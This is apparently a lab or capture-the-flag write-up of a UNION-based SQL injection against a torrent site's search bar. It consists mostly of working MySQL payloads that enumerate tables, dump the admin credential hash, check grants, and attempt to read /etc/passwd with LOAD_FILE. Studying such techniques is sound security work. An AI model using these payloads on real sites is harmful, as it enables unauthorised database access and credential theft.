SQLi


The search bar on the website is confirmed to be vulnerable to SQLi.

Find the number of columns


I first need to find the number of columns returned by the vulnerable SQL query, since a UNION SELECT only works when both sides return the same number of columns.

A first attempt with the wrong count produces an error saying that the SELECT statements have a different number of columns. Thankfully, the SQL error message also shows the entire query, so it is easy to see exactly where the injected string lands.

-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 #

It worked! There are 17 columns in total, and the 5th column is the one rendered on the page.
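The column-count step written out as a sequence of payloads, with the error each one triggers. This is an added example, not part of the original write-up; the shape of the backend query (a 17-column SELECT over a hypothetical `torrents` table filtered on a `name` column) is an assumption, since the page does not reproduce the query that the error message revealed.

```sql
-- Assumed backend query (hypothetical table and column names):
--   SELECT c1, c2, ..., c17 FROM torrents WHERE name LIKE '%<input>%'
-- The payload closes the string with ', appends its own SQL, and the
-- trailing # comments out the leftover %' so the query stays valid.

-- Step 1: bound the column count with ORDER BY. MySQL answers
-- "Unknown column 'n' in 'order clause'" as soon as n exceeds the count,
-- so bisect between a working and a failing value.
-1' ORDER BY 17 #        -- succeeds
-1' ORDER BY 18 #        -- fails: Unknown column '18' in 'order clause'

-- Step 2: confirm with UNION. A mismatch raises
-- "The used SELECT statements have a different number of columns".
-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 #     -- error
-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 #  -- works

-- Step 3: find which column reaches the page. The leading -1' makes the
-- original WHERE unlikely to match anything, so the only row rendered is
-- the UNION row, and whichever marker appears on the page identifies the
-- reflected column (column 5 here). NULL is type-neutral in every position.
-1' UNION SELECT NULL,NULL,NULL,NULL,"col5",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL #

-- Step 4: reuse the reflected column for any expression; the other
-- positions stay literals so the row shape never changes.
-1' UNION SELECT 1,2,3,4,CONCAT_WS(":",@@version,user(),database()),6,7,8,9,10,11,12,13,14,15,16,17 #

-- Encoding note: in a GET parameter the # must be sent as %23, otherwise
-- the browser treats it as a URL fragment and never sends it to the server.
```

Step 4 reads the three values the next section collects one by one in a single request; CONCAT_WS joins them with a separator so they can be told apart in the rendered column.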

Version, DB, User


-1' UNION SELECT 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17 #

The MySQL version is 5.1.37-1ubuntu5.5

-1' UNION SELECT 1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17 #

The current user is torrent

-1' UNION SELECT 1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16,17 #

The current DB is torrenthoster

Tables


-1' UNION SELECT 1,2,3,4,GROUP_CONCAT(table_name),6,7,8,9,10,11,12,13,14,15,16,17 FROM information_schema.tables WHERE table_schema="torrenthoster"#

There is a table, users. That should contain the credentials for the admin user that I found earlier.

Columns


-1' UNION SELECT 1,2,3,4,GROUP_CONCAT(column_name),6,7,8,9,10,11,12,13,14,15,16,17 FROM information_schema.columns WHERE table_name="users" AND table_schema="torrenthoster"#

There are 7 columns in the torrenthoster.users table.

Credential Extraction


-1' UNION SELECT 1,2,3,4,GROUP_CONCAT(userName,":",password),6,7,8,9,10,11,12,13,14,15,16,17 FROM torrenthoster.users #

As expected, there is only the admin user. I got the password hash as well: d5bfedcee289e5e05b86daad8ee3e2e2 (32 hex characters, the shape of an unsalted MD5 digest).

Unfortunately, I was unable to crack the hash.
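Two checks worth running alongside the GROUP_CONCAT dump above, as an added example that is not part of the original write-up: confirm the row count independently, and page through rows one at a time, because GROUP_CONCAT silently truncates its output at group_concat_max_len. The 17-column layout, reflected column 5 and the torrenthoster.users table and column names are taken from the page; nothing else is assumed.

```sql
-- COUNT(*) gives the real number of rows regardless of how much of the
-- concatenated output fitted into the reflected column.
-1' UNION SELECT 1,2,3,4,(SELECT COUNT(*) FROM torrenthoster.users),6,7,8,9,10,11,12,13,14,15,16,17 #

-- GROUP_CONCAT is cut off at group_concat_max_len (1024 bytes by default),
-- so a larger table would lose rows without any error. Read the limit ...
-1' UNION SELECT 1,2,3,4,@@group_concat_max_len,6,7,8,9,10,11,12,13,14,15,16,17 #

-- ... and, when the dump would exceed it, walk the rows with LIMIT offset,1
-- until the reflected column comes back empty.
-1' UNION SELECT 1,2,3,4,CONCAT(userName,":",password),6,7,8,9,10,11,12,13,14,15,16,17 FROM torrenthoster.users LIMIT 0,1 #
-1' UNION SELECT 1,2,3,4,CONCAT(userName,":",password),6,7,8,9,10,11,12,13,14,15,16,17 FROM torrenthoster.users LIMIT 1,1 #

-- Check the stored format before spending time cracking: length 32 and an
-- all-hex value is consistent with unsalted MD5, a salted or prefixed scheme
-- would fail the REGEXP and need a different hashcat/john mode.
-1' UNION SELECT 1,2,3,4,CONCAT(LENGTH(password),":",password REGEXP "^[0-9a-f]{32}$"),6,7,8,9,10,11,12,13,14,15,16,17 FROM torrenthoster.users LIMIT 0,1 #
```

The last query returns `32:1` for a value like the one extracted above; a `0` in the second position means the stored value is not plain hex and the hash type should be re-identified before cracking.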

Other Databases + Lack of Privileges


-1' UNION SELECT 1,2,3,4,GROUP_CONCAT(schema_name),6,7,8,9,10,11,12,13,14,15,16,17 FROM information_schema.schemata #

It shows only two databases. This is likely because the current user does not have privileges on the others: information_schema only lists the schemas the account has some grant on.

That is bad news, as I would not be able to enumerate further or read/write files via SQLi (LOAD_FILE and SELECT ... INTO OUTFILE both require the FILE privilege).

-1' UNION SELECT 1,2,3,4,user,6,7,8,9,10,11,12,13,14,15,16,17 FROM mysql.user #

Attempting to extract the user column from the mysql.user table fails due to lack of privileges; the mysql database is only readable by accounts with an explicit grant on it.
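Rather than inferring the missing privileges from the short database list, the grants can be read directly, and the file-read path tested. This is an added example and not part of the original write-up; the 17-column layout and reflected column 5 come from the page, and the grantee pattern assumes the account name `torrent` reported by user() above.

```sql
-- Global privileges of the current account. information_schema.user_privileges
-- is readable without any grant on the mysql database. FILE must be listed
-- for LOAD_FILE / INTO OUTFILE to work at all.
-1' UNION SELECT 1,2,3,4,GROUP_CONCAT(privilege_type),6,7,8,9,10,11,12,13,14,15,16,17 FROM information_schema.user_privileges WHERE grantee LIKE "%torrent%" #

-- Database-level grants, which explain why only torrenthoster is visible.
-1' UNION SELECT 1,2,3,4,GROUP_CONCAT(table_schema,":",privilege_type),6,7,8,9,10,11,12,13,14,15,16,17 FROM information_schema.schema_privileges WHERE grantee LIKE "%torrent%" #

-- Direct test: without FILE (or if the file is unreadable) LOAD_FILE returns
-- NULL instead of raising an error, so an empty reflected column is the
-- negative result, not a broken payload.
-1' UNION SELECT 1,2,3,4,LOAD_FILE("/etc/passwd"),6,7,8,9,10,11,12,13,14,15,16,17 #

-- Even with FILE, secure_file_priv confines reads and writes: an empty value
-- means unrestricted, a path means only that directory is allowed.
-1' UNION SELECT 1,2,3,4,@@secure_file_priv,6,7,8,9,10,11,12,13,14,15,16,17 #
```

If the first query comes back as just `USAGE`, the account has no global privileges at all and the file-based escalation routes are closed regardless of what secure_file_priv says.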

Unfortunately, this is the end of the SQLi path. Due to the lack of privileges, I cannot proceed further.